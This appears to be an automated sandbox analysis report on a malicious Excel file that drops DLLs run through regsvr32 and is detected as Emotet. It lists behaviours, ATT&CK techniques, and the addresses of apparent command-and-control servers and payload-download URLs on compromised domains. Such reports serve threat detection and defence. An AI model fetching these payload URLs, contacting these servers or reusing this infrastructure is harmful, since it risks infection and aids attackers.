Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\regsvr32.exe TID: 6700	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 6880	Thread sleep time: -60000s >= -30000s

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll			Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe

API coverage: 9.8 %

Source: C:\Windows\System32\regsvr32.exe

Process information queried: ProcessInformation

Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation

Source: regsvr32.exe, 0000000A.00000003.2012380786.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2415264641.0000000000BFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012793437.0000000000BFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066471204.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066014930.00000000009FC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2415830972.0000000000A34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012356542.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066669199.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416016572.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW&

Source: C:\Windows\System32\regsvr32.exe

Code function: 8_2_00007FFD2B064980 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Windows\System32\regsvr32.exe

Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B064980 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_00007FFD2B0691F4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 45.63.99.23 7080
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 173.255.211.88 443
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 182.162.143.56 443

Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\regsvr32.exe	Code function: GetLastError,free,free,GetLocaleInfoW,GetLocaleInfoW,free,GetLocaleInfoW,
Source: C:\Windows\System32\regsvr32.exe	Code function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,
Source: C:\Windows\System32\regsvr32.exe	Code function: GetLocaleInfoW,
Source: C:\Windows\System32\regsvr32.exe	Code function: _getptd,GetLocaleInfoA,
Source: C:\Windows\System32\regsvr32.exe	Code function: EnumSystemLocalesA,
Source: C:\Windows\System32\regsvr32.exe	Code function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,GetLocaleInfoW,GetLocaleInfoW,GetACP,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,
Source: C:\Windows\System32\regsvr32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Windows\System32\regsvr32.exe	Code function: EnumSystemLocalesA,
Source: C:\Windows\System32\regsvr32.exe	Code function: EnumSystemLocalesA,
Source: C:\Windows\System32\regsvr32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free,
Source: C:\Windows\System32\regsvr32.exe	Code function: _getptd,GetLocaleInfoA,GetLocaleInfoW,

Source: C:\Windows\System32\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\System32\regsvr32.exe

Code function: 8_2_00007FFD2B068C48 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Source: C:\Windows\System32\regsvr32.exe

Code function: 8_2_00007FFD2B0675D0 HeapCreate,GetVersion,HeapSetInformation,

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match	File source: 0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2414500170.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	21 Registry Run Keys / Startup Folder	11 Process Injection	141 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	43 Exploitation for Client Execution	1 DLL Side-Loading	21 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	13 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Hidden Files and Directories	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	4 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	125 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Regsvr32	Cached Domain Credentials	26 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO0000001552.xls	66%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
8.2.regsvr32.exe.980000.0.unpack	100%	Avira	HEUR/AGEN.1215461		Download File

Domains

Source	Detection	Scanner	Link
sbm.xinmoshiwang.com	13%	Virustotal	Browse
datie-tw.com	10%	Virustotal	Browse
copunupo.ac.zm	18%	Virustotal	Browse
ly.yjlianyi.top	13%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://roaming.edog.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://api.aadrm.com	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://api.addins.store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	URL Reputation	safe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	0%	Avira URL Cloud	safe
https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/F	100%	Avira URL Cloud	malware
https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/	100%	Avira URL Cloud	malware
https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/	0%	Avira URL Cloud	safe
http://ly.yjlianyi.top/wp-admin/4cChao/	100%	Avira URL Cloud	malware
https://45.63.99.23:7080/tkafmhcgcid/	0%	Avira URL Cloud	safe
http://sbm.xinmoshiwang.com/upload/VaOfWEb3pW76UO/	100%	Avira URL Cloud	malware
https://45.63.99.23:7080/b	0%	Avira URL Cloud	safe
https://my.microsoftpersonalcontent.com	0%	Avira URL Cloud	safe
https://api.scheduler.	0%	Avira URL Cloud	safe
https://45.63.99.23:7080/tkafmhcgcid/8eM	0%	Avira URL Cloud	safe
https://182.162.143.56/tkafmhcgcid/	100%	Avira URL Cloud	malware
https://182.162.143.56/	100%	Avira URL Cloud	malware
https://45.63.99.23:7080/2	0%	Avira URL Cloud	safe
https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/%	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sbm.xinmoshiwang.com	47.92.35.35	true	false	13%, Virustotal, Browse	unknown
datie-tw.com	175.98.167.165	true	false	10%, Virustotal, Browse	unknown
copunupo.ac.zm	41.63.0.22	true	false	18%, Virustotal, Browse	unknown
ly.yjlianyi.top	81.68.152.197	true	false	13%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ly.yjlianyi.top/wp-admin/4cChao/	false	Avira URL Cloud: malware	unknown
https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/	true	Avira URL Cloud: malware	unknown
http://sbm.xinmoshiwang.com/upload/VaOfWEb3pW76UO/	true	Avira URL Cloud: malware	unknown
https://182.162.143.56/tkafmhcgcid/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://login.microsoftonline.com/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://shell.suite.office.com:1443	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://autodiscover-s.outlook.com/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://roaming.edog.	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://cdn.entity.	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://powerlift.acompli.net	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://cortana.ai	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://api.powerbi.com/v1.0/myorg/imports	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/F	regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.aadrm.com/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://api.microsoftstream.com/api/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://cr.office.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	Avira URL Cloud: safe	low
https://portal.office.com/account/?ref=ClientMeControl	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/	regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004490975.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://graph.ppe.windows.net	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://tasks.office.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://officeci.azurewebsites.net/api/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://45.63.99.23:7080/tkafmhcgcid/	regsvr32.exe, 0000000A.00000003.1927257389.0000000000C31000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://api.scheduler.	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	Avira URL Cloud: safe	unknown
https://my.microsoftpersonalcontent.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	Avira URL Cloud: safe	unknown
https://store.office.cn/addinstemplate	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://api.aadrm.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://globaldisco.crm.dynamics.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://messaging.engagement.office.com/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://dev0-api.acompli.net/autodetect	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://www.odwebp.svc.ms	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://api.diagnosticssdf.office.com/v2/feedback	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://api.powerbi.com/v1.0/myorg/groups	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://web.microsoftstream.com/video/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://api.addins.store.officeppe.com/addinstemplate	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://45.63.99.23:7080/b	regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://graph.windows.net	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://dataservice.o365filtering.com/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://consent.config.office.com/consentcheckin/v1.0/consents	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://ncus.contentsync.	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://45.63.99.23:7080/tkafmhcgcid/8eM	regsvr32.exe, 0000000A.00000003.1927693196.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
http://weather.service.msn.com/data.aspx	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://apis.live.net/v5.0/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://messaging.lifecycle.office.com/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://management.azure.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://outlook.office365.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://wus2.contentsync.	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://182.162.143.56/	regsvr32.exe, 0000000A.00000003.2012380786.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416327091.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012998285.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://45.63.99.23:7080/2	regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://insertmedia.bing.office.net/odc/insertmedia	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://api.office.net	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://incidents.diagnosticssdf.office.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/%	regsvr32.exe, 0000000C.00000003.2004490975.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://entitlement.diagnostics.office.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://substrate.office.com/search/api/v2/init	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://outlook.office.com/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://outlook.office365.com/	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high
https://webshell.suite.office.com	E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
110.232.117.186	unknown	Australia	56038	RACKCORP-APRackCorpAU	true
